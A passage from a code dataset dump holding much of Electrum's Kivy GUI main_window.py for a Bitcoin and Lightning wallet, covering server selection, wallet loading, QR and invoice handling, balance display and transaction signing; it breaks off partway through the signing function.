source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.wallet_db import WalletDB
from electrum.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum.plugin import run_hook
from electrum import util
from electrum.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
maybe_extract_bolt11_invoice)
from electrum.invoices import PR_PAID, PR_FAILED
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (NoDynamicFeeEstimates, NotEnoughFunds)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum.simple_config import SimpleConfig
from electrum.plugin import Plugins
from electrum.paymentrequest import PaymentRequest
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
android_backups = BooleanProperty(False)
def on_android_backups(self, instance, x):
self.electrum_config.set_key('android_backups', self.android_backups, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def set_ln_invoice(self, invoice):
self.switch_to('send')
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = intent.getDataString()
if intent.getScheme() == 'bitcoin':
self.set_URI(data)
elif intent.getScheme() == 'lightning':
self.set_ln_invoice(data)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, key, status):
if key not in self.wallet.receive_requests:
return
self.update_tab('receive')
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
# todo: update single item
self.update_tab('send')
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, wallet, key):
description = self.wallet.get_label(key)
self.show_info(_('Payment succeeded') + '\n\n' + description)
self._trigger_update_history()
def on_payment_failed(self, event, wallet, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, decimal_point=self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
App.__init__(self)#, **kwargs)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
if data.startswith('channel_backup:'):
self.import_channel_backup(data)
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice.invoice if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(
title, data, show_text,
failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard,
help_text=help_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
Window.bind(on_key_down=self.on_key_down)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage, db):
if storage:
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True),
ask_if_wizard=True)
def _on_decrypted_storage(self, storage: WalletStorage):
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
if db.requires_upgrade():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.upgrade_storage(storage, db)
else:
self.on_wizard_complete(None, storage, db)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
else:
def launch_wizard():
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
if not ask_if_wizard:
launch_wizard()
else:
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_open_wallet(self, pw, storage):
if not storage.file_exists():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.run('new')
else:
try:
storage.decrypt(pw)
except StorageReadWriteError:
app.show_error(_("R/W error accessing path"))
return
self.password = pw
self._on_decrypted_storage(storage)
def on_stop(self):
Logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
if not self.wallet.has_lightning():
self.show_error(_('Lightning is not enabled for this wallet'))
return
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, wallet, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name)
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum/gui/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
self.request_focus_for_main_view()
def request_focus_for_main_view(self):
if platform != 'android':
return
# The main view of the activity might be not have focus
# in which case e.g. the OS "back" button would not work.
# see #6276 (specifically "method 2" and "method 3")
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
PythonActivity.requestFocusForMainView()
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
text = self.format_amount(c + x + u + l)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(
x,
num_zeros=0,
decimal_point=self.decimal_point(),
is_diff=is_diff,
whitespaces=whitespaces,
)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=None,
on_failure=self.stop)
d.open()
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label):
if not label.data:
return
self.qr_dialog(label.name, label.data, True)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
